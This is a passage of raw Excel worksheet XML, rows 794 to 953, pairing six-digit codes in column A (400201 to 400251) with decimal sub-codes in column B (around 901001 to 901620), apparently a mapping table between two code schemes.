      </c>
    </row>
    <row r="794" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A794" s="6">
        <v>400201</v>
      </c>
      <c r="B794" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="795" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A795" s="6">
        <v>400210</v>
      </c>
      <c r="B795" s="3">
        <v>901587</v>
      </c>
    </row>
    <row r="796" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A796" s="6">
        <v>400210</v>
      </c>
      <c r="B796" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="797" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A797" s="6">
        <v>400210</v>
      </c>
      <c r="B797" s="3">
        <v>901588</v>
      </c>
    </row>
    <row r="798" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A798" s="6">
        <v>400210</v>
      </c>
      <c r="B798" s="3">
        <v>901588.00100000005</v>
      </c>
    </row>
    <row r="799" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A799" s="6">
        <v>400211</v>
      </c>
      <c r="B799" s="3">
        <v>901587</v>
      </c>
    </row>
    <row r="800" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A800" s="6">
        <v>400211</v>
      </c>
      <c r="B800" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="801" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A801" s="6">
        <v>400211</v>
      </c>
      <c r="B801" s="3">
        <v>901587.00199999998</v>
      </c>
    </row>
    <row r="802" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A802" s="6">
        <v>400211</v>
      </c>
      <c r="B802" s="3">
        <v>901588</v>
      </c>
    </row>
    <row r="803" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A803" s="6">
        <v>400211</v>
      </c>
      <c r="B803" s="3">
        <v>901588.00100000005</v>
      </c>
    </row>
    <row r="804" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A804" s="6">
        <v>400211</v>
      </c>
      <c r="B804" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="805" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A805" s="6">
        <v>400211</v>
      </c>
      <c r="B805" s="3">
        <v>901588.00300000003</v>
      </c>
    </row>
    <row r="806" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A806" s="6">
        <v>400220</v>
      </c>
      <c r="B806" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="807" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A807" s="6">
        <v>400220</v>
      </c>
      <c r="B807" s="3">
        <v>901547.00199999998</v>
      </c>
    </row>
    <row r="808" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A808" s="6">
        <v>400220</v>
      </c>
      <c r="B808" s="3">
        <v>901547.00300000003</v>
      </c>
    </row>
    <row r="809" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A809" s="6">
        <v>400220</v>
      </c>
      <c r="B809" s="3">
        <v>901547.00399999996</v>
      </c>
    </row>
    <row r="810" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A810" s="6">
        <v>400220</v>
      </c>
      <c r="B810" s="3">
        <v>901547.005</v>
      </c>
    </row>
    <row r="811" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A811" s="6">
        <v>400220</v>
      </c>
      <c r="B811" s="3">
        <v>901547.00800000003</v>
      </c>
    </row>
    <row r="812" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A812" s="6">
        <v>400220</v>
      </c>
      <c r="B812" s="3">
        <v>901547.01</v>
      </c>
    </row>
    <row r="813" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A813" s="6">
        <v>400220</v>
      </c>
      <c r="B813" s="3">
        <v>901547.01199999999</v>
      </c>
    </row>
    <row r="814" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A814" s="6">
        <v>400220</v>
      </c>
      <c r="B814" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="815" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A815" s="6">
        <v>400220</v>
      </c>
      <c r="B815" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="816" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A816" s="6">
        <v>400220</v>
      </c>
      <c r="B816" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="817" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A817" s="6">
        <v>400220</v>
      </c>
      <c r="B817" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="818" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A818" s="6">
        <v>400220</v>
      </c>
      <c r="B818" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="819" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A819" s="6">
        <v>400220</v>
      </c>
      <c r="B819" s="3">
        <v>901546.00600000005</v>
      </c>
    </row>
    <row r="820" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A820" s="6">
        <v>400220</v>
      </c>
      <c r="B820" s="3">
        <v>901546.00699999998</v>
      </c>
    </row>
    <row r="821" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A821" s="6">
        <v>400220</v>
      </c>
      <c r="B821" s="3">
        <v>901546.00899999996</v>
      </c>
    </row>
    <row r="822" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A822" s="6">
        <v>400220</v>
      </c>
      <c r="B822" s="3">
        <v>901546.01</v>
      </c>
    </row>
    <row r="823" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A823" s="6">
        <v>400220</v>
      </c>
      <c r="B823" s="3">
        <v>901546.01100000006</v>
      </c>
    </row>
    <row r="824" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A824" s="6">
        <v>400220</v>
      </c>
      <c r="B824" s="3">
        <v>901546.01500000001</v>
      </c>
    </row>
    <row r="825" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A825" s="6">
        <v>400220</v>
      </c>
      <c r="B825" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="826" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A826" s="6">
        <v>400220</v>
      </c>
      <c r="B826" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="827" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A827" s="6">
        <v>400220</v>
      </c>
      <c r="B827" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="828" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A828" s="6">
        <v>400220</v>
      </c>
      <c r="B828" s="3">
        <v>901574.00399999996</v>
      </c>
    </row>
    <row r="829" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A829" s="6">
        <v>400220</v>
      </c>
      <c r="B829" s="3">
        <v>901574.005</v>
      </c>
    </row>
    <row r="830" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A830" s="6">
        <v>400220</v>
      </c>
      <c r="B830" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="831" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A831" s="6">
        <v>400220</v>
      </c>
      <c r="B831" s="3">
        <v>901574.01199999999</v>
      </c>
    </row>
    <row r="832" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A832" s="6">
        <v>400220</v>
      </c>
      <c r="B832" s="3">
        <v>901559</v>
      </c>
    </row>
    <row r="833" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A833" s="6">
        <v>400220</v>
      </c>
      <c r="B833" s="3">
        <v>901559.00100000005</v>
      </c>
    </row>
    <row r="834" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A834" s="6">
        <v>400220</v>
      </c>
      <c r="B834" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="835" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A835" s="6">
        <v>400220</v>
      </c>
      <c r="B835" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="836" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A836" s="6">
        <v>400220</v>
      </c>
      <c r="B836" s="3">
        <v>901556.00199999998</v>
      </c>
    </row>
    <row r="837" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A837" s="6">
        <v>400220</v>
      </c>
      <c r="B837" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="838" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A838" s="6">
        <v>400220</v>
      </c>
      <c r="B838" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="839" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A839" s="6">
        <v>400220</v>
      </c>
      <c r="B839" s="3">
        <v>901137.00199999998</v>
      </c>
    </row>
    <row r="840" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A840" s="6">
        <v>400220</v>
      </c>
      <c r="B840" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="841" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A841" s="6">
        <v>400220</v>
      </c>
      <c r="B841" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="842" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A842" s="6">
        <v>400220</v>
      </c>
      <c r="B842" s="3">
        <v>901055.01399999997</v>
      </c>
    </row>
    <row r="843" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A843" s="6">
        <v>400220</v>
      </c>
      <c r="B843" s="3">
        <v>901620</v>
      </c>
    </row>
    <row r="844" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A844" s="6">
        <v>400220</v>
      </c>
      <c r="B844" s="3">
        <v>901021</v>
      </c>
    </row>
    <row r="845" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A845" s="6">
        <v>400220</v>
      </c>
      <c r="B845" s="3">
        <v>901021.00300000003</v>
      </c>
    </row>
    <row r="846" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A846" s="6">
        <v>400220</v>
      </c>
      <c r="B846" s="3">
        <v>901129</v>
      </c>
    </row>
    <row r="847" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A847" s="6">
        <v>400220</v>
      </c>
      <c r="B847" s="3">
        <v>901218</v>
      </c>
    </row>
    <row r="848" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A848" s="6">
        <v>400220</v>
      </c>
      <c r="B848" s="3">
        <v>901218.00199999998</v>
      </c>
    </row>
    <row r="849" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A849" s="6">
        <v>400220</v>
      </c>
      <c r="B849" s="3">
        <v>901218.00699999998</v>
      </c>
    </row>
    <row r="850" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A850" s="6">
        <v>400220</v>
      </c>
      <c r="B850" s="3">
        <v>901218.00800000003</v>
      </c>
    </row>
    <row r="851" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A851" s="6">
        <v>400220</v>
      </c>
      <c r="B851" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="852" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A852" s="6">
        <v>400220</v>
      </c>
      <c r="B852" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="853" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A853" s="6">
        <v>400220</v>
      </c>
      <c r="B853" s="3">
        <v>901553</v>
      </c>
    </row>
    <row r="854" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A854" s="6">
        <v>400220</v>
      </c>
      <c r="B854" s="3">
        <v>901553.00300000003</v>
      </c>
    </row>
    <row r="855" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A855" s="6">
        <v>400220</v>
      </c>
      <c r="B855" s="3">
        <v>901220</v>
      </c>
    </row>
    <row r="856" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A856" s="6">
        <v>400230</v>
      </c>
      <c r="B856" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="857" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A857" s="6">
        <v>400240</v>
      </c>
      <c r="B857" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="858" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A858" s="6">
        <v>400240</v>
      </c>
      <c r="B858" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="859" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A859" s="6">
        <v>400240</v>
      </c>
      <c r="B859" s="3">
        <v>901021</v>
      </c>
    </row>
    <row r="860" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A860" s="6">
        <v>400240</v>
      </c>
      <c r="B860" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="861" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A861" s="6">
        <v>400240</v>
      </c>
      <c r="B861" s="3">
        <v>901080</v>
      </c>
    </row>
    <row r="862" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A862" s="6">
        <v>400250</v>
      </c>
      <c r="B862" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="863" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A863" s="6">
        <v>400250</v>
      </c>
      <c r="B863" s="3">
        <v>901020.00100000005</v>
      </c>
    </row>
    <row r="864" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A864" s="6">
        <v>400250</v>
      </c>
      <c r="B864" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="865" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A865" s="6">
        <v>400250</v>
      </c>
      <c r="B865" s="3">
        <v>901176</v>
      </c>
    </row>
    <row r="866" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A866" s="6">
        <v>400250</v>
      </c>
      <c r="B866" s="3">
        <v>901612</v>
      </c>
    </row>
    <row r="867" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A867" s="6">
        <v>400250</v>
      </c>
      <c r="B867" s="3">
        <v>901602</v>
      </c>
    </row>
    <row r="868" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A868" s="6">
        <v>400250</v>
      </c>
      <c r="B868" s="3">
        <v>901602.00100000005</v>
      </c>
    </row>
    <row r="869" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A869" s="6">
        <v>400250</v>
      </c>
      <c r="B869" s="3">
        <v>901602.00199999998</v>
      </c>
    </row>
    <row r="870" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A870" s="6">
        <v>400250</v>
      </c>
      <c r="B870" s="3">
        <v>901030</v>
      </c>
    </row>
    <row r="871" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A871" s="6">
        <v>400250</v>
      </c>
      <c r="B871" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="872" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A872" s="6">
        <v>400250</v>
      </c>
      <c r="B872" s="3">
        <v>901568</v>
      </c>
    </row>
    <row r="873" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A873" s="6">
        <v>400250</v>
      </c>
      <c r="B873" s="3">
        <v>901568.00100000005</v>
      </c>
    </row>
    <row r="874" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A874" s="6">
        <v>400250</v>
      </c>
      <c r="B874" s="3">
        <v>901568.00199999998</v>
      </c>
    </row>
    <row r="875" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A875" s="6">
        <v>400250</v>
      </c>
      <c r="B875" s="3">
        <v>901114</v>
      </c>
    </row>
    <row r="876" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A876" s="6">
        <v>400250</v>
      </c>
      <c r="B876" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="877" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A877" s="6">
        <v>400250</v>
      </c>
      <c r="B877" s="3">
        <v>901048</v>
      </c>
    </row>
    <row r="878" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A878" s="6">
        <v>400250</v>
      </c>
      <c r="B878" s="3">
        <v>901048.00100000005</v>
      </c>
    </row>
    <row r="879" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A879" s="6">
        <v>400250</v>
      </c>
      <c r="B879" s="3">
        <v>901048.00199999998</v>
      </c>
    </row>
    <row r="880" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A880" s="6">
        <v>400250</v>
      </c>
      <c r="B880" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="881" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A881" s="6">
        <v>400250</v>
      </c>
      <c r="B881" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="882" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A882" s="6">
        <v>400250</v>
      </c>
      <c r="B882" s="3">
        <v>901011</v>
      </c>
    </row>
    <row r="883" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A883" s="6">
        <v>400250</v>
      </c>
      <c r="B883" s="3">
        <v>901011.00100000005</v>
      </c>
    </row>
    <row r="884" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A884" s="6">
        <v>400250</v>
      </c>
      <c r="B884" s="3">
        <v>901008</v>
      </c>
    </row>
    <row r="885" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A885" s="6">
        <v>400250</v>
      </c>
      <c r="B885" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="886" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A886" s="6">
        <v>400250</v>
      </c>
      <c r="B886" s="3">
        <v>901104</v>
      </c>
    </row>
    <row r="887" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A887" s="6">
        <v>400250</v>
      </c>
      <c r="B887" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="888" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A888" s="6">
        <v>400250</v>
      </c>
      <c r="B888" s="3">
        <v>901542</v>
      </c>
    </row>
    <row r="889" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A889" s="6">
        <v>400250</v>
      </c>
      <c r="B889" s="3">
        <v>901542.005</v>
      </c>
    </row>
    <row r="890" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A890" s="6">
        <v>400250</v>
      </c>
      <c r="B890" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="891" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A891" s="6">
        <v>400250</v>
      </c>
      <c r="B891" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="892" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A892" s="6">
        <v>400250</v>
      </c>
      <c r="B892" s="3">
        <v>901090.00100000005</v>
      </c>
    </row>
    <row r="893" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A893" s="6">
        <v>400250</v>
      </c>
      <c r="B893" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="894" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A894" s="6">
        <v>400250</v>
      </c>
      <c r="B894" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="895" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A895" s="6">
        <v>400250</v>
      </c>
      <c r="B895" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="896" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A896" s="6">
        <v>400250</v>
      </c>
      <c r="B896" s="3">
        <v>901021</v>
      </c>
    </row>
    <row r="897" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A897" s="6">
        <v>400250</v>
      </c>
      <c r="B897" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="898" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A898" s="6">
        <v>400250</v>
      </c>
      <c r="B898" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="899" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A899" s="6">
        <v>400250</v>
      </c>
      <c r="B899" s="3">
        <v>901021.00300000003</v>
      </c>
    </row>
    <row r="900" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A900" s="6">
        <v>400250</v>
      </c>
      <c r="B900" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="901" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A901" s="6">
        <v>400250</v>
      </c>
      <c r="B901" s="3">
        <v>901021.005</v>
      </c>
    </row>
    <row r="902" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A902" s="6">
        <v>400250</v>
      </c>
      <c r="B902" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="903" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A903" s="6">
        <v>400250</v>
      </c>
      <c r="B903" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="904" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A904" s="6">
        <v>400250</v>
      </c>
      <c r="B904" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="905" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A905" s="6">
        <v>400250</v>
      </c>
      <c r="B905" s="3">
        <v>901029</v>
      </c>
    </row>
    <row r="906" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A906" s="6">
        <v>400250</v>
      </c>
      <c r="B906" s="3">
        <v>901218</v>
      </c>
    </row>
    <row r="907" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A907" s="6">
        <v>400250</v>
      </c>
      <c r="B907" s="3">
        <v>901218.00300000003</v>
      </c>
    </row>
    <row r="908" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A908" s="6">
        <v>400250</v>
      </c>
      <c r="B908" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="909" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A909" s="6">
        <v>400250</v>
      </c>
      <c r="B909" s="3">
        <v>901218.00699999998</v>
      </c>
    </row>
    <row r="910" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A910" s="6">
        <v>400250</v>
      </c>
      <c r="B910" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="911" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A911" s="6">
        <v>400250</v>
      </c>
      <c r="B911" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="912" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A912" s="6">
        <v>400250</v>
      </c>
      <c r="B912" s="3">
        <v>901205</v>
      </c>
    </row>
    <row r="913" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A913" s="6">
        <v>400250</v>
      </c>
      <c r="B913" s="3">
        <v>901205.00100000005</v>
      </c>
    </row>
    <row r="914" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A914" s="6">
        <v>400250</v>
      </c>
      <c r="B914" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="915" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A915" s="6">
        <v>400250</v>
      </c>
      <c r="B915" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="916" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A916" s="6">
        <v>400250</v>
      </c>
      <c r="B916" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="917" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A917" s="6">
        <v>400250</v>
      </c>
      <c r="B917" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="918" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A918" s="6">
        <v>400250</v>
      </c>
      <c r="B918" s="3">
        <v>901102.00300000003</v>
      </c>
    </row>
    <row r="919" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A919" s="6">
        <v>400250</v>
      </c>
      <c r="B919" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="920" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A920" s="6">
        <v>400251</v>
      </c>
      <c r="B920" s="3">
        <v>901595</v>
      </c>
    </row>
    <row r="921" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A921" s="6">
        <v>400251</v>
      </c>
      <c r="B921" s="3">
        <v>901595.00199999998</v>
      </c>
    </row>
    <row r="922" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A922" s="6">
        <v>400251</v>
      </c>
      <c r="B922" s="3">
        <v>901557</v>
      </c>
    </row>
    <row r="923" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A923" s="6">
        <v>400251</v>
      </c>
      <c r="B923" s="3">
        <v>901557.00100000005</v>
      </c>
    </row>
    <row r="924" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A924" s="6">
        <v>400251</v>
      </c>
      <c r="B924" s="3">
        <v>901557.00199999998</v>
      </c>
    </row>
    <row r="925" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A925" s="6">
        <v>400251</v>
      </c>
      <c r="B925" s="3">
        <v>901071</v>
      </c>
    </row>
    <row r="926" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A926" s="6">
        <v>400251</v>
      </c>
      <c r="B926" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="927" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A927" s="6">
        <v>400251</v>
      </c>
      <c r="B927" s="3">
        <v>901071.00199999998</v>
      </c>
    </row>
    <row r="928" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A928" s="6">
        <v>400251</v>
      </c>
      <c r="B928" s="3">
        <v>901071.00300000003</v>
      </c>
    </row>
    <row r="929" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A929" s="6">
        <v>400251</v>
      </c>
      <c r="B929" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="930" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A930" s="6">
        <v>400251</v>
      </c>
      <c r="B930" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="931" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A931" s="6">
        <v>400251</v>
      </c>
      <c r="B931" s="3">
        <v>901612</v>
      </c>
    </row>
    <row r="932" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A932" s="6">
        <v>400251</v>
      </c>
      <c r="B932" s="3">
        <v>901586</v>
      </c>
    </row>
    <row r="933" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A933" s="6">
        <v>400251</v>
      </c>
      <c r="B933" s="3">
        <v>901586.00100000005</v>
      </c>
    </row>
    <row r="934" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A934" s="6">
        <v>400251</v>
      </c>
      <c r="B934" s="3">
        <v>901132</v>
      </c>
    </row>
    <row r="935" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A935" s="6">
        <v>400251</v>
      </c>
      <c r="B935" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="936" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A936" s="6">
        <v>400251</v>
      </c>
      <c r="B936" s="3">
        <v>901132.00199999998</v>
      </c>
    </row>
    <row r="937" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A937" s="6">
        <v>400251</v>
      </c>
      <c r="B937" s="3">
        <v>901602</v>
      </c>
    </row>
    <row r="938" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A938" s="6">
        <v>400251</v>
      </c>
      <c r="B938" s="3">
        <v>901602.00100000005</v>
      </c>
    </row>
    <row r="939" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A939" s="6">
        <v>400251</v>
      </c>
      <c r="B939" s="3">
        <v>901602.00199999998</v>
      </c>
    </row>
    <row r="940" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A940" s="6">
        <v>400251</v>
      </c>
      <c r="B940" s="3">
        <v>901565</v>
      </c>
    </row>
    <row r="941" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A941" s="6">
        <v>400251</v>
      </c>
      <c r="B941" s="3">
        <v>901565.00199999998</v>
      </c>
    </row>
    <row r="942" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A942" s="6">
        <v>400251</v>
      </c>
      <c r="B942" s="3">
        <v>901001</v>
      </c>
    </row>
    <row r="943" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A943" s="6">
        <v>400251</v>
      </c>
      <c r="B943" s="3">
        <v>901001.00100000005</v>
      </c>
    </row>
    <row r="944" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A944" s="6">
        <v>400251</v>
      </c>
      <c r="B944" s="3">
        <v>901001.00199999998</v>
      </c>
    </row>
    <row r="945" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A945" s="6">
        <v>400251</v>
      </c>
      <c r="B945" s="3">
        <v>901001.00300000003</v>
      </c>
    </row>
    <row r="946" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A946" s="6">
        <v>400251</v>
      </c>
      <c r="B946" s="3">
        <v>901491</v>
      </c>
    </row>
    <row r="947" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A947" s="6">
        <v>400251</v>
      </c>
      <c r="B947" s="3">
        <v>901491.00100000005</v>
      </c>
    </row>
    <row r="948" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A948" s="6">
        <v>400251</v>
      </c>
      <c r="B948" s="3">
        <v>901491.00199999998</v>
      </c>
    </row>
    <row r="949" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A949" s="6">
        <v>400251</v>
      </c>
      <c r="B949" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="950" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A950" s="6">
        <v>400251</v>
      </c>
      <c r="B950" s="3">
        <v>901568</v>
      </c>
    </row>
    <row r="951" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A951" s="6">
        <v>400251</v>
      </c>
      <c r="B951" s="3">
        <v>901568.00300000003</v>
      </c>
    </row>
    <row r="952" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A952" s="6">
        <v>400251</v>
      </c>
      <c r="B952" s="3">
        <v>901573</v>
      </c>
    </row>
    <row r="953" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A953" s="6">
        <v>400251</v>
      </c>
      <c r="B953" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
